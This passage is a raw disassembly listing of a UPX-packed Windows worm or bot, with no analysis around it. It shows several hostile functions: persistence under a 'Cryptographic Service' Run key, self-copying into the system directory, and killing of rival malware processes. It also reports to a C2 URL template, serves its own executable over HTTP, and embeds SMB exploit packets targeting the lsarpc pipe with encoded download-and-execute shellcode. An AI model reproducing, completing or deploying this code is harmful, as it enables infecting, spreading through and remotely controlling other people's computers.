100007Fh jz short loc_314227FA push ebx push offset sub_3142255F call sub_31421F52 pop ecx pop ecx loc_314227FA: ; CODE XREF: UPX0:314227EBj mov dword ptr [esp+10h], 4 loc_31422802: ; CODE XREF: UPX0:31422813j push ebx push offset sub_314225C3 call sub_31421F52 dec dword ptr [esp+18h] pop ecx pop ecx jnz short loc_31422802 test ebp, ebp jle short loc_3142282A loc_31422819: ; CODE XREF: UPX0:31422828j push 0 push offset sub_3142264B call sub_31421F52 pop ecx dec ebp pop ecx jnz short loc_31422819 loc_3142282A: ; CODE XREF: UPX0:31422817j ; UPX0:31422836j ... call sub_31422038 test eax, eax jz short loc_31422838 push edi call esi ; Sleep jmp short loc_3142282A ; --------------------------------------------------------------------------- loc_31422838: ; CODE XREF: UPX0:31422831j ; UPX0:31422844j call sub_31422038 test eax, eax jnz short loc_31422846 push edi call esi ; Sleep jmp short loc_31422838 ; --------------------------------------------------------------------------- loc_31422846: ; CODE XREF: UPX0:3142283Fj call sub_31422712 jmp short loc_3142282A ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_3142284D proc near ; CODE XREF: sub_314229E6+93p ; sub_31422B67+11Ap arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp lea eax, [ebp+arg_4] push eax push 0F003Fh push 0 push [ebp+arg_4] push [ebp+arg_0] call dword_3142100C ; RegOpenKeyExA test eax, eax jnz short loc_31422880 push [ebp+arg_8] push [ebp+arg_4] call dword_31421010 ; RegDeleteValueA push [ebp+arg_4] call dword_31421014 ; RegCloseKey loc_31422880: ; CODE XREF: sub_3142284D+1Cj pop ebp retn sub_3142284D endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31422882 proc near ; CODE XREF: sub_314221C4+33p ; sub_314229E6+84p ... var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h push ebp mov ebp, esp push ecx mov eax, [ebp+arg_10] push esi mov [ebp+var_4], eax lea eax, [ebp+arg_10] push eax xor esi, esi push 0F003Fh push esi push [ebp+arg_4] push [ebp+arg_0] call dword_3142100C ; RegOpenKeyExA test eax, eax jz short loc_314228AE push 1 pop eax jmp short loc_314228D8 ; --------------------------------------------------------------------------- loc_314228AE: ; CODE XREF: sub_31422882+25j lea eax, [ebp+var_4] push eax lea eax, [ebp+arg_4] push [ebp+arg_C] push eax push esi push [ebp+arg_8] push [ebp+arg_10] call dword_31421008 ; RegQueryValueExA test eax, eax jz short loc_314228CD push 2 pop esi loc_314228CD: ; CODE XREF: sub_31422882+46j push [ebp+arg_10] call dword_31421014 ; RegCloseKey mov eax, esi loc_314228D8: ; CODE XREF: sub_31422882+2Aj pop esi leave retn sub_31422882 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_314228DB proc near ; CODE XREF: sub_31422A9B+96p ; sub_31422B67+7Cp ... arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h push ebp mov ebp, esp push esi xor esi, esi lea eax, [ebp+arg_4] push esi push eax push esi push 0F003Fh push esi push esi push esi push [ebp+arg_4] push [ebp+arg_0] call dword_31421000 ; RegCreateKeyExA test eax, eax jz short loc_31422904 push 1 pop eax jmp short loc_3142292B ; --------------------------------------------------------------------------- loc_31422904: ; CODE XREF: sub_314228DB+22j push [ebp+arg_10] push [ebp+arg_C] push 1 push esi push [ebp+arg_8] push [ebp+arg_4] call dword_31421004 ; RegSetValueExA test eax, eax jz short loc_31422920 push 2 pop esi loc_31422920: ; CODE XREF: sub_314228DB+40j push [ebp+arg_4] call dword_31421014 ; RegCloseKey mov eax, esi loc_3142292B: ; CODE XREF: sub_314228DB+27j pop esi pop ebp retn sub_314228DB endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_3142292E proc near ; CODE XREF: sub_314229E6+9Fp var_128 = dword ptr -128h var_120 = dword ptr -120h var_104 = byte ptr -104h arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 128h push ebx mov ebx, [ebp+arg_0] push esi push ebx call dword_31421084 ; lstrlen mov esi, eax dec esi test esi, esi jle loc_314229E2 loc_3142294E: ; CODE XREF: sub_3142292E+27j cmp byte ptr [esi+ebx], 5Ch jz short loc_31422957 dec esi jns short loc_3142294E loc_31422957: ; CODE XREF: sub_3142292E+24j push 0 push 2 call sub_31422D2C ; CreateToolhelp32Snapshot cmp eax, 0FFFFFFFFh mov [ebp+arg_0], eax jz short loc_314229E2 push 128h lea eax, [ebp+var_128] push 0 push eax call sub_31422CD6 ; memset add esp, 0Ch lea eax, [ebp+var_128] mov [ebp+var_128], 128h push eax push [ebp+arg_0] call sub_31422D26 ; Process32First test eax, eax jz short loc_314229E2 lea esi, [esi+ebx+1] loc_3142299F: ; CODE XREF: sub_3142292E+B2j lea eax, [ebp+var_104] push eax push esi call dword_31421104 ; strstr pop ecx test eax, eax pop ecx jz short loc_314229CF push [ebp+var_120] push 0 push 1F0FFFh call dword_314210B0 ; OpenProcess push 0 push eax call dword_31421060 ; TerminateProcess loc_314229CF: ; CODE XREF: sub_3142292E+83j lea eax, [ebp+var_128] push eax push [ebp+arg_0] call sub_31422D20 ; Process32Next test eax, eax jnz short loc_3142299F loc_314229E2: ; CODE XREF: sub_3142292E+1Aj ; sub_3142292E+38j ... pop esi pop ebx leave retn sub_3142292E endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_314229E6 proc near ; CODE XREF: UPX0:3142237Bp var_13C = byte ptr -13Ch var_34 = dword ptr -34h var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_24 = dword ptr -24h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 push ebp mov ebp, esp sub esp, 13Ch push ebx push esi lea eax, [ebp+var_34] push edi mov [ebp+var_34], offset aWindowsSecurit ; "Windows Security Manager" mov [ebp+var_30], offset aDiskDefragment ; "Disk Defragmenter" mov [ebp+var_2C], offset aSystemRestoreS ; "System Restore Service" mov [ebp+var_28], offset aBotLoader ; "Bot Loader" mov [ebp+var_24], offset aSystray ; "SysTray" mov [ebp+var_20], offset aWinupdate ; "WinUpdate" mov [ebp+var_1C], offset aWindowsUpdateS ; "Windows Update Service" mov [ebp+var_18], offset aAvserve_exe ; "avserve.exe" mov [ebp+var_14], offset aAvserve2_exeup ; "avserve2.exeUpdate Service" mov [ebp+var_10], offset aMsConfigV13 ; "MS Config v13" mov [ebp+var_C], offset aWindowsUpdate ; "Windows Update" mov [ebp+var_4], eax mov [ebp+var_8], 0Bh mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"... mov esi, 80000002h loc_31422A56: ; CODE XREF: sub_314229E6+AEj mov eax, [ebp+var_4] push 104h mov ebx, [eax] lea eax, [ebp+var_13C] push eax push ebx push edi push esi call sub_31422882 add esp, 14h test eax, eax jnz short loc_31422A8D push ebx push edi push esi call sub_3142284D lea eax, [ebp+var_13C] push eax call sub_3142292E add esp, 10h loc_31422A8D: ; CODE XREF: sub_314229E6+8Ej add [ebp+var_4], 4 dec [ebp+var_8] jnz short loc_31422A56 pop edi pop esi pop ebx leave retn sub_314229E6 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31422A9B proc near ; CODE XREF: sub_31422B67+D1p ; sub_31422B67+132p var_78 = byte ptr -78h var_14 = byte ptr -14h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 78h cmp [ebp+arg_0], 0 jz short loc_31422AB0 push [ebp+arg_0] call dword_31421074 ; DeleteFileA loc_31422AB0: ; CODE XREF: sub_31422A9B+Aj lea eax, [ebp+var_78] push 63h push eax call dword_3142108C ; GetSystemDirectoryA test eax, eax jz locret_31422B65 push esi call dword_314210FC ; rand and eax, 3 add eax, 5 push eax lea eax, [ebp+var_14] push eax call sub_31421F73 mov esi, dword_31421088 pop ecx pop ecx lea eax, [ebp+var_14] push offset dword_314241F0 push eax call esi ; lstrcat lea eax, [ebp+var_78] push offset dword_314241F8 push eax call esi ; lstrcat lea eax, [ebp+var_14] push eax lea eax, [ebp+var_78] push eax call esi ; lstrcat lea eax, [ebp+var_78] push 0 push eax push [ebp+arg_4] call dword_31421050 ; CopyFileA lea eax, [ebp+var_78] push eax call dword_31421084 ; lstrlen inc eax push eax lea eax, [ebp+var_78] push eax push offset aCryptographicS ; "Cryptographic Service" push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"... push 80000002h call sub_314228DB add esp, 14h push dword_31424FF4 call dword_3142107C ; CloseHandle lea eax, [ebp+var_78] push 0 push eax call dword_31421054 ; WinExec push 1F4h call dword_31421094 ; Sleep push 0 call dword_314210E0 ; ExitProcess pop esi locret_31422B65: ; CODE XREF: sub_31422A9B+23j leave retn sub_31422A9B endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31422B67 proc near ; CODE XREF: UPX0:31422380p var_E8 = byte ptr -0E8h var_84 = byte ptr -84h var_20 = byte ptr -20h push ebp mov ebp, esp sub esp, 0E8h push ebx push esi push edi lea eax, [ebp+var_84] push 63h push eax push 0 call dword_31421048 ; GetModuleFileNameA test eax, eax jz loc_31422CA0 and dword_31425010, 0 lea eax, [ebp+var_20] push 1Dh push eax mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless" push offset aId ; "ID" mov esi, 80000002h push edi push esi call sub_31422882 add esp, 14h test eax, eax jz short loc_31422BED call dword_314210FC ; rand push 0Ah mov ebx, offset aYfhvczaxyr ; "yfhvczaxyr" cdq pop ecx idiv ecx add edx, ecx push edx push ebx call sub_31421F73 pop ecx pop ecx push ebx call dword_31421084 ; lstrlen inc eax push eax push ebx push offset aId ; "ID" push edi push esi call sub_314228DB add esp, 14h jmp short loc_31422BFC ; --------------------------------------------------------------------------- loc_31422BED: ; CODE XREF: sub_31422B67+4Dj lea eax, [ebp+var_20] push eax push offset aYfhvczaxyr ; "yfhvczaxyr" call dword_31421068 ; lstrcpy loc_31422BFC: ; CODE XREF: sub_31422B67+84j lea eax, [ebp+var_E8] push 63h push eax push offset aCryptographicS ; "Cryptographic Service" push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"... push esi call sub_31422882 add esp, 14h test eax, eax jz short loc_31422C42 push 2 push offset a1 ; "1" push offset aClient ; "Client" push edi push esi call sub_314228DB lea eax, [ebp+var_84] push eax push 0 call sub_31422A9B add esp, 1Ch jmp short loc_31422CA0 ; --------------------------------------------------------------------------- loc_31422C42: ; CODE XREF: sub_31422B67+B3j lea eax, [ebp+var_84] push eax lea eax, [ebp+var_E8] push eax call dword_3142104C ; lstrcmpi test eax, eax jnz short loc_31422C8B lea eax, [ebp+var_20] push 1Dh mov ebx, offset aClient ; "Client" push eax push ebx push edi push esi call sub_31422882 add esp, 14h test eax, eax jnz short loc_31422CA0 push ebx push edi push esi mov dword_31425010, 1 call sub_3142284D add esp, 0Ch jmp short loc_31422CA0 ; --------------------------------------------------------------------------- loc_31422C8B: ; CODE XREF: sub_31422B67+F1j lea eax, [ebp+var_84] push eax lea eax, [ebp+var_E8] push eax call sub_31422A9B pop ecx pop ecx loc_31422CA0: ; CODE XREF: sub_31422B67+1Fj ; sub_31422B67+D9j ... pop edi pop esi pop ebx leave retn sub_31422B67 endp ; =============== S U B R O U T I N E ======================================= sub_31422CA5 proc near ; CODE XREF: sub_314211A0+CAp ; sub_314215C7+11p ... arg_0 = dword ptr 4 push 4 push 1000h push [esp+8+arg_0] push 0 call dword_31421044 ; VirtualAlloc retn sub_31422CA5 endp ; =============== S U B R O U T I N E ======================================= sub_31422CB9 proc near ; CODE XREF: sub_314211A0+10Bp ; sub_314215C7+C0p arg_0 = dword ptr 4 push 8000h push 0 push [esp+8+arg_0] call dword_31421040 ; VirtualFree retn sub_31422CB9 endp ; --------------------------------------------------------------------------- align 10h loc_31422CD0: ; DATA XREF: sub_31421422+Ao ; sub_314223B2+Ao jmp dword ptr loc_31421100 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31422CD6 proc near ; CODE XREF: sub_31421801+128p ; sub_31421801+134p ... jmp dword_314210F8 sub_31422CD6 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31422CDC proc near ; CODE XREF: sub_31421801+9Cp ; sub_31421801+C5p ... jmp dword_314210F4 sub_31422CDC endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31422CE2 proc near ; CODE XREF: sub_31421801+93p ; sub_31421801+B2p ... jmp dword_314210F0 sub_31422CE2 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_31422CF0 proc near ; CODE XREF: sub_31421801+8p arg_0 = byte ptr 4 push ecx cmp eax, 1000h lea ecx, [esp+4+arg_0] jb short loc_31422D10 loc_31422CFC: ; CODE XREF: sub_31422CF0+1Ej sub ecx, 1000h sub eax, 1000h test [ecx], eax cmp eax, 1000h jnb short loc_31422CFC loc_31422D10: ; CODE XREF: sub_31422CF0+Aj sub ecx, eax mov eax, esp test [ecx], eax mov esp, ecx mov ecx, [eax] mov eax, [eax+4] push eax retn sub_31422CF0 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31422D20 proc near ; CODE XREF: sub_3142292E+ABp jmp dword_31421064 sub_31422D20 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31422D26 proc near ; CODE XREF: sub_3142292E+64p jmp dword_3142105C sub_31422D26 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_31422D2C proc near ; CODE XREF: sub_3142292E+2Dp jmp dword_31421058 sub_31422D2C endp ; --------------------------------------------------------------------------- db 2 dup(0CCh) dd 4B3h dup(0) dword_31424000 dd 206h, 2400h, 31415352h, 180h, 10001h, 11838DF5h, 2AEC5279h ; DATA XREF: sub_31421422+112o dd 0E7F63AE4h, 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 0A032615Eh dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h dd 3072657Ah, 0 aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0 ; DATA XREF: sub_314215C7+84o align 10h byte_31424080 db 0 ; DATA XREF: sub_314216A2+1Br off_31424081 dd offset dword_314241E4 ; DATA XREF: sub_314216A2+23r align 2 dd offset dword_314241D4 dw 0C401h dd 1314241h, 314241B4h, 4241A000h, 41900131h, 80013142h dd 314241h, 31424174h, 42416800h, 41580131h, 48003142h dd 1314241h, 3142413Ch, 42417400h, 41D40131h, 30003142h dd 314241h, 314241D4h, 42412001h, 41480031h, 10013142h dd 314241h, 31424130h, 42410001h, 40F80131h, 74003142h dd 314241h, 31424130h, 2E767663h, 7572h, 2E777777h, 6C646572h dd 2E656E69h, 7572h, 656C6966h, 72616573h, 722E6863h, 75h dd 6F626F72h, 61686378h, 2E65676Eh, 6D6F63h, 68746566h dd 2E647261h, 7A6962h, 63657361h, 2E616B68h, 7572h, 7473616Dh dd 782D7265h, 6D6F632Eh, 0 dd 6F6C6F63h, 61622D72h, 722E6B6Eh, 75h, 6B76616Bh, 742E7A61h dd 76h, 74757263h, 6E2E706Fh, 75h, 6F64696Bh, 61622D73h dd 722E6B6Eh, 75h, 65726170h, 61622D78h, 722E6B6Eh, 75h dd 6C756461h, 6D652D74h, 65726970h, 6D6F632Eh, 0 dd 666E6F6Bh, 616B7369h, 726F2E74h, 67h, 69746963h, 6E61622Dh dd 75722E6Bh, 0 dword_314241D4 dd 72617778h, 6A632E65h, 656E2E62h, 74h ; DATA XREF: UPX0:31424086o dword_314241E4 dd 617A616Dh, 616B6166h, 75722Eh ; DATA XREF: UPX0:off_31424081o dword_314241F0 dd 6578652Eh, 0 ; DATA XREF: sub_314211A0+75o ; sub_3142207E+55o ... dword_314241F8 dd 5Ch ; DATA XREF: sub_314211A0+49o ; sub_31422A9B+56o aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0 ; DATA XREF: sub_314211A0+13o align 10h aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31421316+1Co align 4 aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31421316+Co align 4 aZer0 db 'zer0',0 ; DATA XREF: sub_31421422+34o align 10h aHttpS db 'http://%s',0 ; DATA XREF: sub_314215C7+71o align 4 aHttpSIndex_php db 'http://%s/index.php?id=%s&scn=%d&inf=%d&ver=19-2&cnt=%s',0 ; DATA XREF: sub_314215C7+57o align 8 byte_314242B8 db 0EBh ; DATA XREF: sub_31421801+24Eo ; sub_31421801+260o ... db 58h word_314242BA dw 7468h ; DATA XREF: sub_31422712+40o dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h, 0C999C999h dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h, 99C99998h dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h, 26F434C9h dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h dd 9966DE5Fh, 0A8EC5AC9h, 99C999A0h, 99C999C9h, 0B7C999C9h dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h) dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h, 83639D90h dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 8712FEFDh dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh dd 0 dword_31424580 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0) ; DATA XREF: sub_31421801+186o dd 0FEFF0000h, 0 dd 2006200h aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0 db 2 db 4Ch ; L db 41h, 4Eh, 4Dh db 41h ; A db 4Eh, 31h, 2Eh db 30h ; 0 align 2 dw 5702h aIndowsForWorkg db 'indows for Workgroups 3.1a',0 db 2 dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh dd 544E0200h, 204D4C20h, 32312E30h, 0 dword_3142460C dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+1BAo dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0 dd 20000000h, 0 dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h dd 4 dup(0) aWindows2000219: unicode 0, <Windows 2000 2195>,0 aWindows20005_0: unicode 0, <Windows 2000 5.0>,0 align 8 dword_314246B8 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+1EEo dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0 dd 57000000h, 0 dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h dd 0 dd 47000000h, 0 dd 40000000h, 0 dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h dd 2E0035h, 30h, 0 dword_31424798 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+8Do dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h dd 5C0030h, 500049h aC: ; DATA XREF: sub_31421801+BFo unicode 0, <C$>,0 a????? db '?????',0 dd 0 dword_314247FC dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+2D4o dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0 dd 2019Fh, 3 dup(0) dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h dd 0 dword_31424868 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+308o dd 4DC0800h, 500800h, 48000010h, 0 dd 4, 2 dup(0) dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h dd 5C0045h, 0 dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0 dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh dd 0 dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0 dword_3142490C dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+4EEo dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0) dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h dd 5C0045h, 0 dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0 dd 3ECh, 0 dword_3142498C dd 401495h, 3, 40707Ch, 1, 0 ; DATA XREF: sub_31421801+51Co dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 40707Ch, 1, 0 dd 1, 0 dd 40707Ch, 1, 0 dd 1, 0 dd 40707Ch, 1, 0 dd 1, 0 dd 138578h, 0E9A65BABh, 0 dword_31424A20 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+347o dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h dd 8FFFFFFh, 10B800h, 4010B800h, 0 dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h dd 0DADh, 0 dd 0DADh, 0 dword_31424A8C dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_31421801+372o dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0) dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h dd 5C0045h, 0 dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0 dword_31424B00 dd 0 ; DATA XREF: sub_31421801+3A0o dd 40A89Ah, 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 1, 0 dd 40A89Ah, 1, 0 dd 1, 0 dd 40A89Ah, 1, 0 dd 1, 0 dd 40A89Ah, 1, 0 dd 1, 3 dup(0) dd 586E6957h, 72502050h, 6Fh, 9 dup(0) db 2 dup(0) dword_31424BBE dd 1004600h ; DATA XREF: sub_31421801+289r dw 1 dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0) dword_31424BF8 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0) ; DATA XREF: sub_31421801+41Bo ; sub_31421801+45Do dd 123C0000h, 751Ch, 0Eh dup(0) ; --------------------------------------------------------------------------- loc_31424C70: ; DATA XREF: sub_31421801+44Ao jmp short loc_31424C78 ; --------------------------------------------------------------------------- jmp short loc_31424C7A ; --------------------------------------------------------------------------- align 8 loc_31424C78: ; CODE XREF: UPX0:loc_31424C70j ; DATA XREF: sub_31421801+5Co pop esp pop esp loc_31424C7A: ; CODE XREF: UPX0:31424C72j and eax, 70695C73h arpl [eax+eax], sp ; --------------------------------------------------------------------------- dw 0 dword_31424C84 dd 1CEC8166h ; DATA XREF: sub_31421801+Dr dword_31424C88 dd 0E4FF07h ; DATA XREF: sub_31421801+1Cr aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31421D68+62o align 10h aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31421D68+39o align 4 aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31421D68+2Ao align 10h aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31421D68+1Bo align 4 aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31421D68+8o ; sub_314223B2+12Co align 10h aUterm192 db 'uterm19-2',0 ; DATA XREF: sub_31421DF0:loc_31421ED5o ; UPX0:31422351o ... align 4 aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_31421DF0+58o align 4 aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_31421DF0:loc_31421E37o align 10h aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_31421DF0+34o align 10h aKernel32 db 'kernel32',0 ; DATA XREF: sub_31421DF0+18o align 4 dword_31424D3C dd 0E9F3F5h ; DATA XREF: sub_3142207E+112o aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3142207E+106o db 0Dh,0Ah db 0Dh,0Ah,0 align 4 aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_3142207E+85o db 0Dh,0Ah,0 align 10h aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3142207E+71o db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0 align 10h aGet db 'GET',0 ; DATA XREF: sub_3142207E+3Do aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:3142233Co align 10h aUser32 db 'user32',0 ; DATA XREF: sub_314223B2+133o align 4 aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_314223B2+125o align 10h aWininet db 'wininet',0 ; DATA XREF: sub_314223B2+11Eo aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_314223B2+111o align 10h aU192x db 'u19-2x',0 ; DATA XREF: sub_314223B2+BDo align 4 aU19 db 'u19',0 ; DATA XREF: sub_314223B2+B6o aU18 db 'u18',0 ; DATA XREF: sub_314223B2+AFo aU17 db 'u17',0 ; DATA XREF: sub_314223B2+A8o aU16 db 'u16',0 ; DATA XREF: sub_314223B2+A1o aU15 db 'u15',0 ; DATA XREF: sub_314223B2+9Ao aU14 db 'u14',0 ; DATA XREF: sub_314223B2+93o aU13i db 'u13i',0 ; DATA XREF: sub_314223B2+8Co align 4 aU13 db 'u13',0 ; DATA XREF: sub_314223B2+85o aU12 db 'u12',0 ; DATA XREF: sub_314223B2+7Eo aU11 db 'u11',0 ; DATA XREF: sub_314223B2+77o aU10 db 'u10',0 ; DATA XREF: sub_314223B2+70o aU9 db 'u9',0 ; DATA XREF: sub_314223B2+69o align 4 aU8 db 'u8',0 ; DATA XREF: sub_314223B2+62o align 10h aU18x db 'u18x',0 ; DATA XREF: sub_314223B2+5Bo align 4 aU17x db 'u17x',0 ; DATA XREF: sub_314223B2+54o align 10h aU16x db 'u16x',0 ; DATA XREF: sub_314223B2+4Do align 4 aU15x db 'u15x',0 ; DATA XREF: sub_314223B2+46o align 10h aU14x db 'u14x',0 ; DATA XREF: sub_314223B2+3Fo align 4 aU13x db 'u13x',0 ; DATA XREF: sub_314223B2+38o align 10h aU12x db 'u12x',0 ; DATA XREF: sub_314223B2+31o align 4 aU11x db 'u11x',0 